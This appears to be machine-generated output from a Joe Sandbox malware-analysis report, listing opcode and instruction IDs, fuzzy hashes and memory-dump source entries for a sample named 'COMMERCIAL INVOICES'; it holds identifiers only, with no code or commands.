Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ff9ca3886ea8e82671308681a01daa7e29b71d6fdc946a6fdc47d125522bb87b
• Instruction ID: 54b7c7935a060f9c56eb00bcfd732339b46fa2504b8233c2bfda6c1fc6e4520f
• Opcode Fuzzy Hash: ff9ca3886ea8e82671308681a01daa7e29b71d6fdc946a6fdc47d125522bb87b
• Instruction Fuzzy Hash: C7F0AF706253459FC310FF68C442A2BB7E4FF98710F40465EB998DB394E634E901CB96
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 94b6ddc4a7b064d16d59dba6076b7a8ebe8d4654bc0a1769b92b56525d91a2b4
                                                                                                                                                                                                                                      • Instruction ID: 80333e73f898b51dec56e8ff2445fe73679b6e1102139d025ad85e4b1aa18008
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94b6ddc4a7b064d16d59dba6076b7a8ebe8d4654bc0a1769b92b56525d91a2b4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7F09B31A355914FE77AD72CD584F5577E4AF10738F1A19B4D40A8795AC734DC40C650
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                                                                                      • Instruction ID: ef5920042e531229ff5a71f36882956eeeef7d8270b568e65c0b344828167df4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BE0DF32A90110BBEB22A7998D05FABBEADDBA4EA0F050055BB00E7090E530EE00D690
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                                                                                                                      • Instruction ID: 083841ccc67073755758e47dae191bc739f4081f4088514b355ba3d127babe1f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68E09B316443548BCB2D8A2DC140A93BFE8EF9566CF158069ED0547616C231F882C6D0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 12587b3b1f7053fb9730c8c8ce316b07b32ff744446acde32b7cd365fdb473a8
                                                                                                                                                                                                                                      • Instruction ID: 6b2c4ae2b3512d1e1ff0a1d65c76dac9f189f060f1943f8aac10568dd0881f33
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12587b3b1f7053fb9730c8c8ce316b07b32ff744446acde32b7cd365fdb473a8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49E09272110594ABC326FF2ADD01FAA779AEF603A0F014515F11557190CA30A950C798
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                                                                                      • Instruction ID: 18e277b9ccfa3318c103061975f365f054ca4156a89041938bebf18998165199
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43E06531021A52DBE732AB2AD848B66BBE0EF50711F14882CA29A128B0C7B598C0CA40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                                                                      • Instruction ID: a3c111fecc9b29785fae6284c074c79f2bd8c9514612c3ac061919ae2f4ab948
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7E0C2343503468FE719DF19C050B637BB6BFD5A10F28C168AA488F205EB32E842CB40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 758a29a1c1a71563ee0b6f9843346ff09dc55a40b24140097b30febb65f50475
                                                                                                                                                                                                                                      • Instruction ID: c6b550e4e2d854e3f7066df9d7c9a8b2a22aa746049b9ffbc24dfacd01ad0412
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 758a29a1c1a71563ee0b6f9843346ff09dc55a40b24140097b30febb65f50475
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BD02B324B10726ACB76F9387C04FA33A5D9B50321F014860F608D2010D574CCA193C8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                                                                      • Instruction ID: cb8498139ebf10dfabd05b95dfac10b54c622b44173b81e4229b31b0b160c76f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0E0C231132A51EFDB323F29EC01F6176E5FF94B50F214A29F1810A4A487B4AC81CB44
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b21258148ba9201e1965a7c178fe07931033199b79c4a31cb8a9337547c87e7b
                                                                                                                                                                                                                                      • Instruction ID: 6aec2b4570fb07ac9a4788a878ac162edf30ee50cb5b309cc515a39ee73a6662
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b21258148ba9201e1965a7c178fe07931033199b79c4a31cb8a9337547c87e7b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADE0C232110490AFC316FF5EED41F6A739EEFA43B0F000221F1518B290CA30AD40C7A8

Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
• Instruction ID: d20e2d4467e5cbe41983db7757a0c160f6083dc5b51214f8af18e8b8cde0fe85
• Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
• Instruction Fuzzy Hash: 71D05E36521A50AFC7329F1BEA00C13BBF9FBC5B51705062EE54583920C674A806CBA0

Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
• Instruction ID: 2cc1ad43c599077ac7a04d1bafc9471c6ec66a32c21564ae6d6fc6fb4ca8d522
• Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
• Instruction Fuzzy Hash: 2DD0A932624620ABDB72AA1CFC40FD333E8BB887A1F0A0459F208C7150C360AC81CA84

Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
• Instruction ID: 5fbf90edb0299b31a79679a8227c265daa3b76598567c3950157393949c1278a
• Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
• Instruction Fuzzy Hash: 47E0EC35960A859BDF56DF59C680F9ABBB5FB94B80F160054A5485B660C634AD00CB40

Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
• Instruction ID: 7a8b805f65032104e46e7d37838fb21ccb1b4b0bd5790fc9e704039619ddce0b
• Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
• Instruction Fuzzy Hash: 83D0223223203193CB2896556800F63AA05ABC0AD0F0A003C790AE3800C0148C42C2E0

Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
• Instruction ID: 48d10f4964bc8590b6163a1ebee99df84aa8d36bb6cc4e19b6a0986ad2f2d883
• Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
• Instruction Fuzzy Hash: 01D012371E054DBBCB11DF66DC41FA57BA9E764BA0F445020F904875A0C63AE950D684

Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f0d77a04ea086e7b54d2243c3300f37eaae848fc4db89010a82583a457dbdd8a
• Instruction ID: b6f7ac0754eaf71a978c44ccde4f88ef01df145653adbff66ac2181b7b2b5615
• Opcode Fuzzy Hash: f0d77a04ea086e7b54d2243c3300f37eaae848fc4db89010a82583a457dbdd8a
• Instruction Fuzzy Hash: A1D09E345755039BDF16EF59C55197A7E78EB14781F400068E70561520D339DD519650

Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
• Instruction ID: 06016b34d23eedc827db7d74fc16c8a83507611d0bc215befebca9aed157c9f8
• Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
• Instruction Fuzzy Hash: 3AD0C935222E81CFD76BCB1DC9A4B1573A4BB44B84FC50490F901CBB22D6BCD940CA04

Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
• Instruction ID: 42b90ba18c1f48c65b32ff380874db4890968e65c49d8a9fc8eee8eb02b6d0d8
• Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
• Instruction Fuzzy Hash: 66C012322A0648AFC712EA99CD41F127BA9EBA8B80F000021F6048B670C631E820EA84

Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
• Instruction ID: 076fc2ecc0e9dae7acd5d0d442dc3a5e344c784a6a85ccbaf6594c42a8ae8b77
• Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
• Instruction Fuzzy Hash: 7DD01236110288EFCB05DF41C890DAA772AFBD8710F108019FD19076508A31ED62DA50

Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
• Instruction ID: 8c3ac194cea7fd037e0dbc2b8176c4dca1d8171389815cff91004c8d9725355b
• Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
• Instruction Fuzzy Hash: DCC04C757115428FCF15DB1DD2D4F5577F4F744740F151890E945CB721E624E801CA10
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 125b38c3d33fb6589a0ee378e1305ec3b4205d74117977aaaa9d852988c90053
                                                                                                                                                                                                                                      • Instruction ID: 7532fb9786c1fc431f30e934fda9e2d3b30e72268c84da6b3e9c79dad5d826bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 125b38c3d33fb6589a0ee378e1305ec3b4205d74117977aaaa9d852988c90053
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31900231615804129640715C48845464005A7E1301B59C011E1428554CCA188A565365
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ee8e8d8c04e11346d194a5af158712addaef825d9ae5f3d3db03e4bd7b14bf62
                                                                                                                                                                                                                                      • Instruction ID: 20a42c3c458dd62d5ca0bef2af0c37bda7fe3d1c49c71b45bff526197cf434ba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee8e8d8c04e11346d194a5af158712addaef825d9ae5f3d3db03e4bd7b14bf62
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7900261611504424640715C48044066005A7E2301399C115A1558560CC61C8955936D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ef437922c606a098d01ee68889c3a07024c3b6600079c4d620abf6dd9cdcee12
                                                                                                                                                                                                                                      • Instruction ID: 554672a34297e86567764a8557859dc3d65e5014d65b97c2f9ee55f9c585472c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef437922c606a098d01ee68889c3a07024c3b6600079c4d620abf6dd9cdcee12
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC90023161540C02D650715C4414746000597D1301F59C011A1028654DC7598B5577A5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 580c4776220cd56ad6d36e910eeb6ccd60534f2c80b6d4a65df98032b67376f7
                                                                                                                                                                                                                                      • Instruction ID: 4706f12a0d2e1fe4d20a5628088c20936a9373da80e48092af7d9b69411cd281
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 580c4776220cd56ad6d36e910eeb6ccd60534f2c80b6d4a65df98032b67376f7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A690023121140C02D604715C4804686000597D1301F59C011A7028655ED66989917235
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e4fd6bc12eb87b8b04a612cbe6149e7feefa7ced2a6eab4c1c5441bfb30d858a
                                                                                                                                                                                                                                      • Instruction ID: 5c08063840f88e11168e29d8dccea1d1e30ffa06a2c8d21b55701cf443561e87
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4fd6bc12eb87b8b04a612cbe6149e7feefa7ced2a6eab4c1c5441bfb30d858a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B90023121544C42D640715C4404A46001597D1305F59C011A1068694DD6298E55B765
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9bb82c52e590b71f3683a32b1a4d2544fe1030b740f287ea0f523b6d4ed74fed
                                                                                                                                                                                                                                      • Instruction ID: 54e9a296743353f46a5cea0b57ae6e1c72ad34aed200a28686354106e2cb1a8a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9bb82c52e590b71f3683a32b1a4d2544fe1030b740f287ea0f523b6d4ed74fed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4190023121140C02D680715C440464A000597D2301F99C015A1029654DCA198B5977A5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 960b7caafd3069e254bcd9e475b266f096359dcdc7220d1bd63b8b442a290d16
                                                                                                                                                                                                                                      • Instruction ID: 11bba9af80c132e39d69b9e326b6ef74043eb299a7ead9f4754d016baad0de11
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 960b7caafd3069e254bcd9e475b266f096359dcdc7220d1bd63b8b442a290d16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D69002A1211544924A00B25C8404B0A450597E1201B59C016E2058560CC52989519239
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3205a5d714111b9cdbbd2e1b7e847140ca1807424ca20ec3304d2a90bcb1d284
                                                                                                                                                                                                                                      • Instruction ID: dd0f0028596ce8996bbeefa705637511684426686a3ee1198477796e3c21102b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3205a5d714111b9cdbbd2e1b7e847140ca1807424ca20ec3304d2a90bcb1d284
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4900225231404020645B55C060450B0445A7D7351399C015F241A590CC62589655325
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b89acafeb8086118a1563131ff47d1397f2b9df47e1ac90edaf6e22ad24d174a
• Instruction ID: 8e182c8bd63c261dde52834dcad7277aa6db749c981958799ff89191e1bb75ac
• Opcode Fuzzy Hash: b89acafeb8086118a1563131ff47d1397f2b9df47e1ac90edaf6e22ad24d174a
• Instruction Fuzzy Hash: 89900225221404030605B55C0704507004697D6351359C021F2019550CD62589615225
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7d1f94bc4175d7e5956d0d04541c56675cf4d8c6e9616c00c1fb36315e4b7fed
• Instruction ID: 985a1b485c32f9820bdeb9073e32ce0f11885f528a6af6477bc7b9ad46ba65e2
• Opcode Fuzzy Hash: 7d1f94bc4175d7e5956d0d04541c56675cf4d8c6e9616c00c1fb36315e4b7fed
• Instruction Fuzzy Hash: 4F90022131140403D640715C54186064005E7E2301F59D011E1418554CD91989565326
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d22ff452b561811b4b444561d6bb1e4518ae270bd7305b35f1000cd1cc344714
• Instruction ID: 57d6c32c4def5f6b616ddd1228657c34e7e60562738c620cedc3558f2ba26700
• Opcode Fuzzy Hash: d22ff452b561811b4b444561d6bb1e4518ae270bd7305b35f1000cd1cc344714
• Instruction Fuzzy Hash: BB90022121544842D600755C5408A06000597D1205F59D011A2068595DC6398951A235
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4f4e756078df44a21c1faff916d7f181781623f0aed4500c7a79c8b413b2ee97
• Instruction ID: f3ed4f3d5edf60de66f75158fced605ac964d90eb59ad3f87193ea28b478da0e
